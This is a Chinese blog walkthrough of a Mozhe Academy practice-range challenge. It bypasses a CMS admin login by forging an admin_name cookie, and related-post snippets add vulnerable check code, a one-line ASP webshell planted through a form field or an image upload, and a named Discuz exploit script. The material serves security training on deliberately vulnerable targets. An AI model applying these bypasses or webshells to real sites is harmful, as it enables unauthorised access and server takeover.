墨者学院-CMS系统漏洞分析溯源(第5题)

最新推荐文章于 2024-03-07 18:14:57 发布
最新推荐文章于 2024-03-07 18:14:57 发布
阅读量385 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100540156
版权

CMS系统漏洞分析溯源(第5题)

难易程度:★★★★
题目类型:CMS漏洞
使用工具:FireFox浏览器、burpsuite、御剑

1.打开靶场,先用御剑扫一下。
在这里插入图片描述
发现后台地址/admin。

2.按F12,在cookie editor中添加一个Name=admin_name,value值随机。
在这里插入图片描述
3.访问/admin,截包可以看到cookie中已经添加了admin_name=admin。
在这里插入图片描述
4.最后访问/admin/cms_admin.php,拉到最下面看到key。
在这里插入图片描述

JimWu95
关注
墨者_CMS系统漏洞分析溯源(第5)
weixin_50698958的博客
10-13 405
靶场: https://www.mozhe.cn/bug/detail/141 背景介绍 某日工程师发现一网站后台,苦苦尝试密码,一直未能登录,请你帮工程师想想办法。 实训目标 1、了解cookie的含义; 2、知晓常见验证方式; 3、熟练使用burp; 解方向 不一定非要知道密码才能登录哦。 解思路: 1、御剑扫描 找到后台登录目录: 2、用cookie edit 修改cookie,添加admin_name,value任意 3、访问/admin,再访问/admin/cm
墨者靶场 中级:CMS系统漏洞分析溯源(第5
qq_43233085的博客
01-18 654
墨者靶场 中级:CMS系统漏洞分析溯源(第5目背景介绍实训目标解方向解步骤 目 背景介绍 某日工程师发现一网站后台,苦苦尝试密码,一直未能登录,请你帮工程师想想办法。 实训目标 1、了解cookie的含义; 2、知晓常见验证方式; 3、熟练使用burp; 解方向 不一定非要知道密码才能登录哦。 解步骤 启动靶机,访问链接。 有目可知方向是cookie修改登录,使用工具扫出后台...
墨者学院 - CMS系统漏洞分析溯源(第5)
多崎巡礼的博客
10-29 1620
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php <?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?>   判断如果没有admin_na...
CMS系统漏洞分析溯源(第5)
cc_de_csdn的博客
08-25 381
1.由提示可以知道本需要我们不使用密码登录 2.打开靶场,使用御剑扫描,发现一个/admin/的后台地址页面 3.通过资料了解到这个php通过校验访问的cookie,使用cookie edit修改cookie,添加admin_name,value随意 4.访问/admin/cms_admin.php,进入后台 5.拉倒网页最下面拿到KEY ...
墨者学院-CMS系统漏洞分析溯源(第4)
JimWu的博客
09-04 836
CMS系统漏洞分析溯源(第4) 难易程度:★★★ 目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
墨者学院-CMS系统漏洞分析溯源(第7)
JimWu的博客
09-04 989
CMS系统漏洞分析溯源(第7) 难易程度:★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先在网上查一下dedecms的漏洞。 知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫,然后打开burpsuite,访问/member/resetpassword.php,截包。 我们send to repeater,修改get的参数 ?...
墨者学院_CMS系统漏洞分析溯源(第9)
weixin_50698958的博客
09-23 662
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
墨者学院 - CMS系统漏洞分析溯源(第4)
多崎巡礼的博客
10-09 1062
使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...
墨者 - CMS系统漏洞分析溯源(第5)
吃肉唐僧的博客
07-19 919
御剑一顿乱扫 挖到后台登录地址 卡住了,不知如何入手 后来看到别人的解思路,别人是直接下载了该网站的源码分析, 参考链接:https://www.yuag.org/2016/08/23/phpecms1-3-cookies%E6%AC%BA%E9%AA%97%E6%BC%8F%E6%B4%9E%E8%BF%9B%E5%90%8E%E5%8F%B0/ phpecms1.3/admi...
CMS系统漏洞分析溯源(第5)——解视频全过程
渗透测试
09-07 718
CMS系统漏洞分析溯源(第5) 解思路: 登陆页面>>>扫描后台地址>>>登陆地址>>>查看是否可以绕过>>>不可以的话>>>百度管理系统源码>>>分析源码>>>查看登陆页面>>>找到相关php文件>>>admin_name>>>浏览器添加cookie>>>直接访问带有漏洞php文件的页面>>&
墨者学院---CMS系统漏洞分析溯源(第5)
qq_35105713的博客
10-25 1209
 cookie添加 admin_name字段,Value任意。保存 访问http://219.153.49.228:48489/admin/cms_admin.php,即可获得key
360众测靶场库之28-CMS系统漏洞分析溯源(第5)
最新发布
zjl12344的博客
03-07 300
360众测靶场
墨者学院 - CMS系统漏洞分析溯源(第2)
多崎巡礼的博客
08-06 1373
登陆后台。 使用admin.php就可以进入后台 用户名密码都是自动填上的,直接登陆就可以。 界面->模板风格->详细列表->search->index.html->将一句话木马添加进去后保存。      ...
墨者学院-CMS系统漏洞分析溯源(第3)
ploto_cs的博客
10-09 552
一.漏洞描述 在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,拿到shell 二.影响版本 新云CMS 4.0.0 SP1 三.漏洞复现 1.使用御剑对域名进行探测 登录网址为http://219.153.49.228/login.asp 2.注册用户 在“密码问”插入一句话木马 一句话木马为: <% execute request(“a”)%>” 经过Erlang 中文简体字 GB2312 转 unicode 转换来的 ┼攠數畣整爠煥敵瑳∨≡┩愾 3.检查木马是否上传成功
墨者学院-CMS系统漏洞分析溯源(第9)
ploto_cs的博客
10-15 761
一.解思路 查询版本,直接使用工具破解 二.操作步骤 1.浏览网址 可以看到版本号为Discuz 7.2 2.利用工具查看是否存在漏洞 使用工具dz7.x_faq.py 源码为: #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf-8 -*- # author iswin import sys import hashlib import time import math import base64 import
墨者学院CMS系统漏洞分析溯源(第2)—3种解法详细介绍
ploto_cs的博客
10-13 796
解法一 解方法: 使用一句话木马进行连接 操作步骤: 1.对网址进行探测 2.发现后台版本文件robots.txt 发现CMS为 PHPCMS v9 后台登录页面为 admin.php 3.浏览 自动填入密码 浏览源码可以发现密码为:I@vH@U$9n8* 也可以将源码中密码的字段名由password改为text 4.查看是否与墨者学院-CMS系统漏洞分析溯源(第7)存在相同的文件上传漏洞 原文回顾:https://blog.csdn.net/ploto_cs/article/details/
墨者学院 - WebShell文件上传漏洞分析溯源(第5)
多崎巡礼的博客
08-14 1741
弱口令 admin admin 进入后台 添加文章-上传asp一句话木马的图片马,记住返回的路径 当前数据库路径更改为上传一句话木马后返回的路径 备份数据库名称填写后缀为asp的文件名 菜刀链接即可   不能理解为什么数据库名是路径到文件,按理说应该是一个只到文件夹的路径才对。。。 言而总之,就是备份数据可以将文件重命名          ...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值